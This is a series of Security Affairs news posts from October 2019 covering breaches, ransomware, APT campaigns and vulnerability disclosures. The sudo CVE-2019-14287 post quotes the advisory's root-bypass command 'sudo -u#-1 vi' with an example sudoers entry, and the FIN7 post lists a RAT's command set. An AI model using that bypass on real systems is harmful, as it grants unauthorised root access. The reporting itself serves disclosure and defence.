Out of 82 security flaws, 45 vulnerabilities affecting Adobe Acrobat and Reader have been rated critical. The exploitation of the flaws could lead to arbitrary code execution in the context of the current user.

The company also addressed 23 important-rated out-of-bounds read and cross-site scripting issues that could lead to information disclosure.

26 vulnerabilities in Adobe Acrobat and Reader reside due to use-after-free, 6 due to out-of-bounds write, 4 are type confusion bugs, 4 are untrusted pointer dereference, 3 are heap overflow bugs, one a buffer overrun and one a race condition flaw.

A majority of critical-rated vulnerabilities (i.e., 26) in Adobe Acrobat and Reader reside due to use-after-free, 6 due to out-of-bounds write, 4 are type confusion bugs, 4 due to untrusted pointer dereference, 3 are heap overflow bugs, one buffer overrun and one race condition issue.

Adobe fixed a privilege escalation flaw in Download Manager for Windows that is caused by insecure file permissions.

Adobe also addressed a dozen flaws in the Experience Manager marketing solution. An attacker could exploit the vulnerabilities to gain unauthorized access to an organization’s Experience Manager environment.

The company also fixed a XSS flaw in the Experience Manager Forms that lead to the disclosure of sensitive information.

The good news is that Adobe is not aware of any attacks exploiting the vulnerabilities in the wild.

Pierluigi Paganini

(SecurityAffairs – hacking, security updates)

The post Adobe out-of-band security updates address 82 flaws in 3 products appeared first on Security Affairs.

Click2Mail suffered a data breach that potentially impacts 200,000 registrants

Click2Mail.com, a US Postal Service affiliate partner, has suffered a data breach that exposed the personal information of its users.

The US Postal Service affiliate partner Click2Mail has suffered a data breach that exposed the personal information of its users.

The company allows its users to professionally print letters, flyers or postcards and deliver them in a business day at low prices.

It also allows users to manage mailing lists conveniently through the web browser. The company is sending out data breach notices to its impacted users.

The incident was first reported first by DataBreaches.net which was contacted by a former customer of Click2Mail who reported their suspicion that Click2Mail may have been hacked. The security breach was discovered on October 4, 2019.

Exposed users’ data include name, organization name, account mailing address, email address, and phone number. The company pointed out that it doesn’t store users’ financial data.

“We have learned that your personal information, including name, organization name, account mailing address, email address, and phone number may have been compromised.” reads the data breach notice sent to the users. “On October 4th, 2019 it was discovered that registered Click2Mail users’ names and email addresses were being used by unknown parties to send multiple spam emails. Technical analysis of our systems detected an intrusion point that was closed that same day.”

Click2Mail logo

The company hired a cyber-security firm to help its staff in investigating the incident.

Lee Garvey, President and CEO of Click2Mail confirmed that the company is going to notify the incident to its 200,000 Click2Mail.com registrants.

“In a follow-up communication, Lee Garvey, President and CEO of Click2Mail, informs this site that slightly more than 200,000 Click2Mail.com registrants will be receiving notifications, which will be sent out in segments, not all at once.” states a post published on databreaches.net. “Garvey also explained that prior to receiving this site’s email inquiry, they had received an email from a helpful customer who had used a tagged email address and was getting spam.  From the description, it sounds like the same former customer who contacted this site to alert us to their suspicions that Click2Mail had been hacked.”

Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

The post Click2Mail suffered a data breach that potentially impacts 200,000 registrants appeared first on Security Affairs.

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

The Pitney Bowes company announced that a ransomware attack infected its systems and cause a partial system outage that made some of its service unavailable for some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

“At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” 

The good news is that there is no evidence that hackers accessed company information. The company has hired an external security firm to support its investigation into the security breach.

The mailing system products were paralyzed by the attack, the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even is its customers will not be able to refill their postage meter until the systems are restored, that can will be able to print postage if they have funds.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment, and some of our Support pages, with Software and Data Marketplace downloads being unavailable.

For Commerce Services clients, impacted solutions include Fulfillment, Delivery and Returns clients and Presort services were impacted.

The Software and Data products are not affected by the ransomware attacks because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page www.pb.com/systemupdate to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

The post Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack appeared first on Security Affairs.

sudo flaw allows any users to run commands as Root on Linux

Experts discovered a security policy bypass issue in the Sudo utility that is installed as a command on almost every Linux and Unix system.

The Sudo utility that is installed as a command on almost every Linux and Unix system is affected by a security policy bypass issue tracked as CVE-2019-14287.

The vulnerability could be exploited by an ill-intentioned user or a malicious program to execute arbitrary commands as root on a targeted Linux system, even if the “sudoers configuration” disallows the root access.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

“When sudo is configured to allow a user to run commands as an arbitrary user via the ALL keyword in a Runas specification, it is possible to run commands as root by specifying the user ID -1 or 4294967295.” reads the security advisory.

“This can be used by a user with sufficient sudo privileges to run commands as root even if the Runas specification explicitly disallows root access as long as the ALL keyword is listed first in the Runas specification.

Log entries for commands run this way will list the target user as 4294967295 instead of root. In addition, PAM session modules will not be run for the command.”

Unlike the su command, users must, by default, supply their password for authentication, rather than the password of the target user. Once authenticated, and if the configuration file (/etc/sudoers) permits the user access, the system will invoke the requested command. 

Administrators can configure a sudoers file to define which users are allowed to run a list of commands as to specific users.

Now, due to the CVE-2019-14287 flaw, even is a user is not allowed to run a specific command as root it is possible to bypass the restriction

An attacker could exploit the vulnerability to run commands as root just by specifying the user ID “-1” or “4294967295.” This is possible because the function that converts user id into its username incorrectly handles the ‘-1’ value, or its unsigned equivalent 4294967295, and interprets it as 0, which is always associated with user ID of root user.

“Fixed CVE-2019-14287, a bug where a sudo user may be able to + run a command as root when the Runas specification explicitly + disallows root access as long as the ALL keyword is listed first.” states the advisory.

So, even if a user has been restricted to run a specific, or any, command as root, the vulnerability could allow the user to bypass this security policy and completely take over the system.

“Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value ALL in the Runas specifier.” continues the advisory.

“Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run.”

“Additionally, because the user ID specified via the -u option does not exist in the password database, no PAM session modules will be run.

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. For example, given the following sudoers entry:”

    myhost bob = (ALL, !root) /usr/bin/vi

User bob is allowed to run vi as any user but root. However, due to the bug, bob is actually able to run vi as root by running sudo -u#-1 vi, violating the security policy.”

The CVE-2019-14287 vulnerability was discovered by Joe Vennix of Apple Information Security, it affects Sudo versions prior to 1.8.28.

Linux users urge to update sudo package to the latest version as soon as it is available.

Pierluigi Paganini

(SecurityAffairs – Linux, Sudo)

The post sudo flaw allows any users to run commands as Root on Linux appeared first on Security Affairs.

Winnti Group was planning a devastating supply-chain attack against Asian manufacturer

Winnti Group is back with a new modular Win backdoor that was used to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Security experts at ESET revealed that Winnti Group continues to update its arsenal, they observed that the China-linked APT group using a new modular Windows backdoor that they used to infect the servers of a high-profile Asian mobile hardware and software manufacturer.

Researchers also discovered that the APT group used an updated version of its ShadowPad malware. The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad.

Experts analyzed recent supply chain attacks against the gaming industry in Asia and noticed the use of a unique packer in a backdoor dubbed PortReuse.

“After analyzing the custom packer used by the Winnti Group, we started hunting for more executable files with this packer, in the hope of unearthing other compromised software used in supply-chain attacks. What we’ve found is not exactly what we were looking for to begin with. Instead of finding compromised software, we discovered a new listening-mode modular backdoor that uses the same packer. We believe its author call it PortReuse.” reads the paper published by ESET. “This is not a random name: this backdoor injects into a running process already listening on a TCP port, “reusing” an already open port. It hooks the receiving function and waits for a “magic” packet to trigger the malicious behavior. The legitimate traffic is forwarded to the real application, so it is effectively not blocking any legitimate activity on the compromised server. This type of backdoor is sometimes called a passive network implant “

In the attack against a video game developer, the malware was being distributed via a game’s official update server.

The PortReuse backdoor has a modular architecture, experts discovered that its components are separate processes that communicate through named pipes. Experts detected multiple PortReuse variants with a different NetAgent but using the same SK3. Each variant spotted by the experts was targeting different services and ports, including DNS over TCP (53), HTTP (80), HTTPS (443), Remote Desktop Protocol (3389) and Windows Remote Management (5985).

The backdoor malware is being served in the following ways:

  • Embedded in a .NET application launching the initial Winnti packer;
  • In a VB script that and invokes a .NET object that launches the;
  • In an executable that has the directly at the entry point;

PortReuse doesn’t need for command and control (C2) servers, instead, it leverages the NetAgent listening on open sockets. The attacker only needs to connect directly to the compromised host.

“The PortReuse backdoor does not use a C&C server; it waits for an incoming connection that sends a “magic” packet. To do so, it doesn’t open an additional TCP port; it injects into an existing process to “reuse” a port that is already open. To be able to parse incoming data to search for the magic packet, two techniques are used: hooking of the receiving function (WSARecv or even the lower level NtDeviceIoControlFile) or registering a handler for a specific URL resource on an IIS server using HttpAddUrl with a URLPrefix.” continues the analysis.

ESET was able to identify one company that was hit by a variant of the PortReuse backdoor that injects itself within Microsoft IIS using a “GET request and inspecting the Server and Content-Length headers.” Using the Censys search engine the experts discovered eight infected machines belonging to the same organization having indicators of compromise that were matching the PortReuse infection.

The organizations is major mobile hardware and software manufacturer based in Asia, experts contacted it to alert the company of the infection.

“It is possible that the Winnti Group was planning a devastating supply-chain attack by compromising this organization,” conlcudes the analysis.

“The Winnti Group is still very active in 2019 and continues to target both gaming and other industries. The update to the ShadowPad malware shows they are still developing and using it. The relatively new PortReuse malware also shows they update their arsenal and give themselves an additional way to compromise their victims for a long period of time.”

Pierluigi Paganini

(SecurityAffairs – Winnti, malware)

The post Winnti Group was planning a devastating supply-chain attack against Asian manufacturer appeared first on Security Affairs.

Privacy advocates criticize Apple for sharing some users browsing data with Tencent

New problems for Apple, most of its users likely ignore that the company is sharing iOS web browsing data on some of them to Chinese giant Tencent.

Most Apple users likely don’t know that the tech giant is sending iOS web browsing data on some of them to the Chinese giant Tencent.

The news is worrying, starting from at least iOS 12.2, Apple has integrated the “Tencent Safe Browsing” to improve security of its users and protect them from fraudulent websites. The Tencent Safe Browsing does it by implementing the “Fraudulent Website Warning” feature in the Safari web browser for both iOS and macOS that checks every site visited by the users.

Apple secure browsing

The service leverages a blacklist of malicious websites that are continuously updated. The blacklist was initially provided by Google’s Safe Browsing service. In order to prevent users from visiting malicious websites, blacklisting services have to know the websites he visits and also log their IP address to manage the browsing history. At the time, it’s not clear if Tencent is also collecting IP addresses from users residing outside of China, likely the Tencent’s blacklist is only provided to Chinese users because Google’s services are blocked in the country.

“Before visiting a website, Safari may send information calculated from the website address to Google Safe Browsing and Tencent Safe Browsing to check if the website is fraudulent. These safe browsing providers may also log your IP address,” Apple notes.

Experts fear that Tencent could have access to the same data sent to Google and intelligence experts believe that it could share the same information with the Chinese government.

“Tencent works closely with the Chinese Communist Party. It facilitates government censorship in China through its multi-functional utility app WeChat.” reported the website reclaimthenet.org. “The company also released a game pro-Chinese Communist Party game called Clap for Xi Jinping: An Awesome Speech in 2017 which, as the title suggests, encourages users to virtually clap for the Chinese president Xi Jinping. In addition to this, Tencent is reportedly collaborating with the Chinese Communist Party to develop “patriotic” video games.”

Privacy advocates believe that such kind of major changes has to be notified to the users.

The good news is that users could turn off the Fraudulent Website Warning feature in Safari, even if they are potentially exposed to online threats.

The feature is enabled by default on iPhones and iPads devices running iOS 13, below the instruction to disable it:

  • iOS: Settings > Safari > Turn off Fraudulent Website Warning
  • macOS: Safari > Preferences > Security > Uncheck Warn when visiting a fraudulent website

Pierluigi Paganini

(SecurityAffairs – Apple, privacy)

The post Privacy advocates criticize Apple for sharing some users browsing data with Tencent appeared first on Security Affairs.

Imperva explains how hackers stole AWS API Key and accessed to customer data

Imperva shared details on the incident it has recently suffered and how hackers obtain data on Cloud Web Application Firewall (WAF) customers.

In August, cybersecurity firm Imperva disclosed a data breach that exposed sensitive information for some customers of its Cloud Web Application Firewall (WAF) product, formerly known as Incapsula.

Incapsula, is a CDN service designed to protect customers’ website from all threats and mitigate DDoS attacks.

Imperva CEO Chris Hylen revealed that the company learned about the incident on August 20, 2019, when it was informed about the data exposure impacting Cloud Web Application Firewall (WAF) product.

“We want to be very clear that this data exposure is limited to our Cloud WAF product.” reads the Hylen’s announcement. “Here is what we know about the situation today:

  • On August 20, 2019, we learned from a third party of a data exposure that impacts a subset of customers of our Cloud WAF product who had accounts through September 15, 2017.
  • Elements of our Incapsula customer database through September 15, 2017 were exposed. These included:
    • email addresses
    • hashed and salted passwords

Laked data included email addresses and hashed and salted passwords for all Cloud WAF customers who registered before 15th September 2017.

Hylen added that for a subset of the Incapsula customers, through September 15, 2017, were exposed API keys and customer-provided SSL certificates.

In a blog post published by Imperva, the company confirmed that it was informed of the incident by someone who had requested a bug bounty. The firm explained that the data was exfiltrated without exploiting any vulnerability in its systems.

The analysis of the data confirmed that attackers stole data in October.

“Our investigation identified an unauthorized use of an administrative API key in one of our production AWS accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords.” reads the post published by Imperva.

“We compared the SQL dump in the provided dataset to our snapshots and found a match. As of this post, we can say that the elements of customer data defined above were limited to Cloud WAF accounts prior and up to September 15, 2017. Databases and snapshots for our other product offerings were not exfiltrated,”

The company announced to have adopted additional security measures to protect its customers, including the creation of new instances behind its VPN by default, the implementation of monitoring and patching programs, decommission unused and non-critical compute instances.

Imperva explained that the incident was related to the process migration of its infrastructure to AWS cloud technologies that begun back in 2017.

At the time, the development team created a database snapshot for testing and to evaluate the migration to AWS. An internal compute instance that they created was exposed online and it contained an AWS API key. This instance was compromised and hackers exfiltrated the AWS API key and used it to access the snapshot.

In response to the incident, Imperva changed 13,000 passwords, more than 13,500 SSL certificates have been rotated and regenerated roughly 1,400 API keys. The good news is that the company is not aware of malicious account activity associated with the hack.

While the company is still investigating the incident it recommends the following security measures to its customers:

Pierluigi Paganini

(SecurityAffairs – Imperva, hacking)

The post Imperva explains how hackers stole AWS API Key and accessed to customer data appeared first on Security Affairs.

Talos experts found 11 flaws in Schneider Electric Modicon Controllers

Cisco Talos experts discovered nearly a dozen flaws affecting some of the models of Schneider Electric’s Modicon programmable logic controllers.

Talos experts discovered 11 security flaws affecting some models of Schneider Electric’s Modicon programmable logic controllers.

Affected models are Modicon M580, M340, BMENOC 0311, BMENOC 0321, Quantum, Premium, and Modicon BMxCRA and 140CRA.

The unique model that is affected by all the vulnerabilities is the M580 PLC. The flaws affect the implementation of the ModbusFTP and TFTP protocols, and the REST API. Schneider Electric published four advisories to address the vulnerabilities.

The vulnerabilities in the TFTP and the REST API were tracked with codes between CVE-2019-6841 and CVE-2019-6851, an attacker could exploit them by sending specially crafted requests to the impacted devices.

The vulnerability in the TFTP protocol, tracked as CVE-2019-6851, is a File and Directory Information Exposure issue that could cause the disclosure of information from the controller when using this protocol.

REST API is affected by three vulnerabilities, CVE-2019-6848, CVE-2019-6849, CVE-2019-6850.

CVE-2019-6848 is an uncaught exception issue that could be exploited to cause a Denial of Service condition by sending specific data on the REST API of the controller/communication module.

CVE-2019-6849 is an Information Exposure vulnerability that could cause the disclosure of sensitive information when using specific Modbus services provided by the REST API of the controller/communication module.

CVE-2019-6850 is another Information Exposure vulnerability that could cause the disclosure of sensitive information when reading specific registers with the REST API of the controller/communication module.

Most of the vulnerabilities in the FTP protocol (CVE-2019-6841, CVE-2019-6842, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846, CVE-2019-6847) could be exploited to cause a DoS condition.

Talos researchers reported the vulnerabilities to Schneider Electric in May and July. The company’s advisories provide a series of recommendations for preventing the exploitation of the issues. Talos blog post also includes SNORT rules to detect exploitation attempts.

Pierluigi Paganini

(SecurityAffairs – Schneider Electric Modicon, hacking)

The post Talos experts found 11 flaws in Schneider Electric Modicon Controllers appeared first on Security Affairs.

Charming Kitten Campaign involved new impersonation methods

Iran-linked APT group Charming Kitten employed new spear-phishing methods in attacks carried out between August and September.

Security experts at ClearSky analyzed attacks recently uncovered by Microsoft that targeted a US presidential candidate, government officials, journalists, and prominent expatriate Iranians. Microsoft Threat Intelligence Center (MSTIC) observed the APT group making more than 2,700 attempts to identify consumer email accounts belonging to specific Microsoft customers and then attack 241 of those accounts.

ClearSky researchers pointed out that these attacks represent a shift in the group tactics because this is the first time that the Charming Kitten group attempted to interfere in the elections of a foreign country.

The experts said, with medium-high confidence, that the campaign uncovered by Microsoft is the same campaign they observed over the past several months.

“We evaluate in a medium-high level of confidence, that Microsoft’s discovery and our findings in our previous and existing reports is a congruent operation” reads the report published by ClearSky, “based on the following issues:

  • Same victim profiles
  • Time overlapping
  • Similar attack vectors”

Iran-linked Charming Kitten group, (aka APT35, PhosphorusNewscaster, and Ajax Security Team) made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011. 

As part of the recently observed campaign, the state-sponsored hackers used three different spear-phishing methods:

  • Ending an email message leveraging social engineering methods.
  • Impersonating social media websites, such as Facebook, Twitter and Instagram, as well as using these social media to spread malicious links. Experts also has observed a few social media entities that used social media to contact their victims in order to trick them into visiting malicious websites.
  • Sending SMS messages to the cellular phone of the victim. The messages include a link and claim to inform the recipient of an attempt to compromise their email account. The link points to a malicious phishing website.

Experts have identified more than eight new and unknown domains, all of which bear the ‘.site’ TL, that were involved in the attacks.

Other technical information, along with indicators of compromise (IoCs) are included in the report.

Pierluigi Paganini

(SecurityAffairs – Charming Kitten, Iran)

The post Charming Kitten Campaign involved new impersonation methods appeared first on Security Affairs.

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced to have restored normal operation after paying the ransom request by crooks that infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted out to pay the ransom and announced to have restored normal operation.

The hospital chain hasn’t revealed the amount it has paid to the crooks to decrypt the data, it seems that an insurance covered the cost.

Recently I reported that several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure. At the time, a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, revealed that the infrastructures had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

The operations at the hospitals were severely impacted for 10 days during which the hospitals kept treating people, but new patients were sent to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The systems at the hospitals have been infected with a variant of the Ryuk ransomware, internal staff reverted to using paper files.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Alabama Hospital chain paid ransom to resume operations after ransomware attack appeared first on Security Affairs.

Security Affairs newsletter Round 235

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

Hacker is auctioning a database containing details of 92 million Brazilians
Iran-linked Phosphorus group hit a 2020 presidential campaign
UK NCSC agency warns of APTs exploiting Enterprise VPN vulnerabilities
D-Link router models affected by remote code execution issue that will not be fixed
Data from Sephora and StreetEasy data breaches added to HIBP
PoS malware infections impacted four restaurant chains in the U.S.
US will help Baltic states to secure baltic energy grid
Developer hacked back Muhstik ransomware crew and released keys
Experts found a link between a Magecart group and Cobalt Group
Hackers continue to exploit the Drupalgeddon2 flaw in attacks in the wild
MS October 2019 Patch Tuesday updates address 59 flaws
Users reported problems with patches for CVE-2019-1367 IE zero-day
Hackers compromised Volusion infrastructure to siphon card details from thousands of sites
Multiple APT groups are exploiting VPN vulnerabilities, NSA warns
Researchers discovered a code execution flaw in NSA GHIDRA
Twitter inadvertently used Phone Numbers collected for security for Ads
vBulletin addresses three new high-severity vulnerabilities
Amnesty claims that 2 Morocco rights advocates were targeted by NSO Group spyware
Attor malware was developed by one of the most sophisticated espionage groups
iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware
Ops, popular iTerm2 macOS Terminal App is affected by a critical RCE since 2012
SAP October 2019 Security Patch Day fixes 2 critical flaws
Tor Project is going to remove End-Of-Life relays from the network
Hacker breached escort forums in Italy and the Netherlands and is selling user data
Researchers released a free decryptor for the Nemty Ransomware
Sophos fixed a critical vulnerability in Cyberoam firewalls
Tens of million PCs potentially impacted by a flaw in HP Touchpoint Analytics
Top cybersecurity certifications to consider for your IT career
FIN7 Hackers group is back with a new loader and a new RAT
Leafly Cannabis information platform suffered a data leak
SIM cards used in 29 countries are vulnerable to Simjacker attack

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 235 appeared first on Security Affairs.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns

Confiant researchers have discovered a new Mac malware dubbed Tarmac distributed via malvertising campaigns in the US, Italy, and Japan.

Security experts at Confiant have discovered a new Mac malware dubbed Tarmac that is distributed via malvertising campaigns in the US, Italy, and Japan.

“Malicious ads redirect victims to sites showing popups peddling software updates, mainly Adobe Flash Player updates, that once executed will install first install the OSX/Shlayer MacOS malware, which then execute the final payload, the OSX/Tarmac” reads the analysis.

“Indeed, that’s not the official Adobe installer but a fake Flash Player installer that was signed using an Apple developer certificate 2L27TJZBZM issued probably to a fake identity named : Fajar Budiarto

Malware authors use to sign malware with Apple developer certificates because it is quite easy to do and allow their code to bypass security protections like Gatekeeper and XProtect.

Tarmac

This malvertising campaign distributing the two malware Shlayer and Tarmac began in January, but at the time experts did not spot the Tarmac malicious code.

Tarmac acts as a second-stage payload for the Shlayer infection, experts pointed out that at the time of the analysis the command and control servers had been shut down and the samples they analyzed were relatively old. Experts believe the campaign is still ongoing and threat actors likely changed its infrastructure.

Tarmac gathers information about the infected hardware and sends it to the C2 servers, then it waits for commands.

At the time of the analysis, it was not possible to understand which commands the malware supports because the C&C servers were down.

Experts noticed that most of key components strings are protected with custom encryption and compression in the attempt to thwart analysis.

ZDNet reported that the malvertising campaign that distributed the Shlayer and Tarmac combo was targeted at users located in the US, Italy, and Japan.

The analysis published by the experts also includes additional technical details along with indicators of compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – Tarmac, malvertising)

The post A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns appeared first on Security Affairs.

Leafly Cannabis information platform suffered a data leak

Leafly, a cannabis information platform, suffered a data leak that exposed the personal information of some of its customers.

Leafly, the world’s leading cannabis resource, informed its customers via email that has suffered a data leak. On September 30, the company discovered that customer

The company discovered on September 30 that a secondary database was exposing customer information from July 2, 2016.

Exposed records include user’s email addresses, usernames and encrypted passwords, fortunately, no financial data was collected by the company.

For some users, the database also leaked names, ages, gender, location, and mobile numbers.

“On September 30, we teamed that a set of Leafly user records dated July 2, 2016 held in a secondary Leafly database was disclosed without permission. Your email address was in that file,” reads the notification email sent to the impacted customers. Leafly does not collect credit card information or national identification numbers,”

Leafly Cannabis Website

The company hired a forensic security firm to help its staff in the investigation. The company recommends users to reset the password and use a unique password for each service online.

“However, it is a good idea to ensure that you use a unique password on Leafly and other services you use. If you share passwords across services and haven’t updated them recently, and you haven’t reset your Leafly password, we recommend you do SO DOW,” continues the notification mail.

“Please accept our sincere apology for any concern this has caused. If you have any questions, please reach out to our customer support team at support@leafly.com,” states Leafly.

At the time it is not clear the number of impacted users. 

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

The post Leafly Cannabis information platform suffered a data leak appeared first on Security Affairs.

FIN7 Hackers group is back with a new loader and a new RAT

FireEye Mandiant discovered that the FIN7 hacking group added new tools to its cyber arsenal, including a module to target remote administration software of ATM vendor.

Security experts at FireEye Mandiant discovered that the FIN7 hacking group has added new tools to its arsenal, including a new loader and a module that hooks into the legitimate remote administration software used by the ATM maker NCR Corporation.

The group that has been active since late 2015 targeted businesses worldwide to steal payment card information. Fin7 is suspected to have hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

In August 2018, three members of the notorious cybercrime gang have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

The new loader is able to drop the malware directly in memory, it was dubbed BOOSTWRITE and allows threat actors to load several malicious codes, including the Carbanak backdoor.

Researchers also spotted a new RAT tracked as RDFSNIFFER that is dropped by the BOOSTWRITE loader.

“The first of FIN7’s new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. One of the analyzed BOOSTWRITE variants contained two payloads: CARBANAK and RDFSNIFFER.” reads the Mandiant report. “While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators.”

BOOSTWRITE implements the DLL search order hijacking technique to load its DLLs into the target’s memory that allows it to download the initialization vector (IV) and the decryption two embedded payload DLLs.

Before decrypting the embedded PE32.DLLs payloads the loader performs sanity checks on the results, then load them into memory.

The researchers analyzed several samples of BOOSTWRITE, one of them that was uploaded to VirusTotal on October 3 was signed with a code signing certificate issued by MANGO ENTERPRISE LIMITED.

fin7 detection

The loader was observed delivering the RDFSNIFFER DLL which allows an attacker to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions.

RDFSNIFFER hooks the process of NCR Corporation’s RDFClient, it runs every time the legitimate software for remote administration is executed on the compromised machines.

The malicious code is designed to run man-in-the-middle attacks on connections made using RDFClient, it also allows attackers to upload, download, execute and/or delete arbitrary files.

Below the list of supported commands:

Command NameLegit Function in RDFClientRDFClient Command IDDescription
UploadFileMgrSendFile107Uploads a file to the remote system
DownloadFileMgrGetFile108Retrieves a file from the remote system
ExecuteRunCommand3001Executes a command on the remote system
DeleteRemoteFileMgrDeleteFile3019Deletes file on remote system
DeleteLocalDeletes a local file

In March, the group carried out attacks delivering a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The messages sent to the victims were also dropping the backdoor DNSbot that primarily operates over DNS traffic.

In April 2018, FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

“While these incidents have also included FIN7’s typical and long-used toolsets, such as CARBANAK and BABYMETAL, the introduction of new tools and techniques provides further evidence FIN7 is continuing to evolve in response to security enhancements.” concludes the report.

“Barring any further law enforcement actions, we expect at least a portion of the actors who comprise the FIN7 criminal organization to continue conducting campaigns.”

Pierluigi Paganini

(SecurityAffairs – FIN7, hacking)

The post FIN7 Hackers group is back with a new loader and a new RAT appeared first on Security Affairs.

SIM cards used in 29 countries are vulnerable to Simjacker attack

Security researchers at Adaptive Mobile who discovered the SimJacker issue have published the list of countries where mobile operators use flawed SIM cards.

Exactly one month ago, researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in many countries. The experts discovered that that the exploitation of the vulnerability is independent of the model of phone used by the victim.

Now Adaptive Mobile published the list of countries where local mobile operators are using SIM cards affected by the Simjacker flaw, anyway the company did not name the impacted mobile phone carriers.

“This varies by country and region. From our analysis we could identify 61 Mobile Operators (excluding MVNOs) in the 29 countries that use this technology.” reads the report. “Based on public reported information the cumulative subscriber numbers of these S@T Browser-using Operators comes to ~861 million mobile connections (SIM cards).” “Not all SIM cards in the operator may use this technology. In discussions with a few operators in the LATAM region we were informed that the majority of SIM Cards (>90%) in their network had it.”

Below the full list of countries published by the experts:

Central America:
Mexcio
Guatemala
Belize
Dominican Republic
El Salvador
Honduras
Panama
Nicaragua
Costa Rica

South America:
Brazil
Peru
Colombia
Ecuador
Chile
Argentina
Uruguay
Paraguay

Africa:
Ivory Coast
Ghana
Benin
Nigeria
Cameroon

Europe:
Italy
Bulgaria
Cyprus

Asia:
Saudi Arabia
Iraq
Lebanon
Palestine

The S@T Browser application is installed on multiple SIM cards, including eSIM, as part of SIM Tool Kit (STK), it enables the SIM card to initiate actions which can be used for various value-added services.

